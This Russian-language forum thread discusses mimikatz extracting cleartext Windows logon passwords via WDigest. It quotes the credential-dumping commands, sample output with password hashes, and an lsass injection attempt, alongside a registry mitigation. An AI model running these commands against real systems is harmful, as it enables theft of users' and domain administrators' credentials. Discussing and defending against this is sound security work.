Обнаружена опасная уязвимость в Microsoft Windows

Аватара пользователя
exo

Обнаружена опасная уязвимость в Microsoft Windows

Сообщение exo »

Локальный пользователь может получить доступ к потенциально важным данным. Возможно данная угроза исключена при использовании
HIPS


Исследователь Benjamin "gentilkiwi" ("хороший киви") недавно опубликовал в своем блоге новую версию утилиты mimikatz 1.0, предназначенной для работы с учетными данными на ОС Windows. В новой версии, помимо функционала, аналогичного Windows Credentials Editor, был реализован функционал получения пароля пользователя в открытом виде.

Брешь, используемая mimikatz, связана с реализацией WDigest.dll, предназначенной для дайджест-аутентификации. Особенности реализации механизма HTTP Digest Authentication для поддержки SSO (Single Sign On) требуют знание вводимого пароля, а не только его хеша. Поэтому, разработчики Windows решили хранить пароли пользователей в открытом виде.

Чтобы просмотреть список паролей авторизованных пользователей на системе необходимо выполнить следующие команды:



privilege::debug

sekurlsa::logonPasswords full



Вывод будет примерно следующим:


Цитата:



Authentification Id : 0;210550

Package d'authentification : Kerberos

Utilisateur principal : user

Domaine d'authentification : domain

msv1_0 :

* Utilisateur : user

* Domaine : domain

* Hash LM : 25d934a376b906731d71060d896b7a46

* Hash NTLM : 13b98a9edbce8ef280527c9dd2725ea0

kerberos :

* Utilisateur : user

* Domaine : domain

* Mot de passe : password

wdigest :

* Utilisateur : user

* Domaine : domain

* Mot de passe : password

tspkg :

* Utilisateur : user

* Domaine : domain

* Mot de passe : password



новость взял
отсюда


скачать утилиту можно
отсюда




лично проверил (вин 7, 2008 R2) - работает только под администратором. В предыдущей версии утилиты антивирусы с HISP могли блокировать доступ. С неё помощью можно мигрировать пароли пользователей, если нужна очень "тихая" миграция.
Аватара пользователя
snark

Re: Обнаружена опасная уязвимость в Microsoft Windows

Сообщение snark »

Печально... и никаких "противоядий" нету?
Аватара пользователя
exo

Re: Обнаружена опасная уязвимость в Microsoft Windows

Сообщение exo »

Цитата snark:



и никаких "противоядий" нету?
Обнаружена опасная уязвимость в Microsoft Windows




ищу варианты с удалением пароля после выхода из системы. после перезагрузки - пароля нет.
Аватара пользователя
Severny

Re: Обнаружена опасная уязвимость в Microsoft Windows

Сообщение Severny »

http://devteev.blogspot.com/2012/02/0day-lsa.html


Противоядие здесь, но если о нем не знает атакующий.




Цитата:



В качестве временного решения можно отключить поставщика безопасности wdigest через соответствующую ветвь реестра (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa). Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке.



Однако пригодится штуковина.
Аватара пользователя
exo

Re: Обнаружена опасная уязвимость в Microsoft Windows

Сообщение exo »

Цитата Severny:



Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке.
Обнаружена опасная уязвимость в Microsoft Windows




если у него прав хватит на реестр.
Аватара пользователя
Delirium

Re: Обнаружена опасная уязвимость в Microsoft Windows

Сообщение Delirium »

Цитата exo:



Если пользователь имеет права локального администратора, он может получить пароли всех пользователей, которые работали до него без перезагрузки компьютера... в том числе и доменного админа...
Обнаружена опасная уязвимость в Microsoft Windows




Если пользователь локальный админ - тушите свечи сразу.

А доменному админу вооообще нечего делать локально на машине, для этого должны существовать отдельные учетные записи.

А вообще интересно.
Аватара пользователя
Severny

Re: Обнаружена опасная уязвимость в Microsoft Windows

Сообщение Severny »

Цитата exo:



если у него прав хватит на реестр.
Обнаружена опасная уязвимость в Microsoft Windows




С правами сложности у атакующего могут возникнуть, а так на всякий случай лежит собственная regedit.exe в комплекте.
Аватара пользователя
exo

Re: Обнаружена опасная уязвимость в Microsoft Windows

Сообщение exo »

решил я тут на днях вспомнить как это делается. Не получается: при проверке lsass.exe отказано в доступе. Может какие обновления были в винде...

Или от того, что NOD32 установили... но на компе без антивируса - всё работает...
Аватара пользователя
winbond

Re: Обнаружена опасная уязвимость в Microsoft Windows

Сообщение winbond »

На 8 и 2012 неактуально. cmd под админом:



"mimikatz # inject::process lsass.exe sekurlsa.dll

PROCESSENTRY32(lsass.exe).th32ProcessID = 636

Erreur : Impossible d'injecter ! ; (0x00000005) Отказано в доступе.



mimikatz # @getLogonPasswords

Erreur : pas ou plus de communication etablie"
Аватара пользователя
exo

Re: Обнаружена опасная уязвимость в Microsoft Windows

Сообщение exo »

вот тоже самое получаю в некоторых 7-ых компах..
Ответить

Вернуться в «Новости и события Microsoft»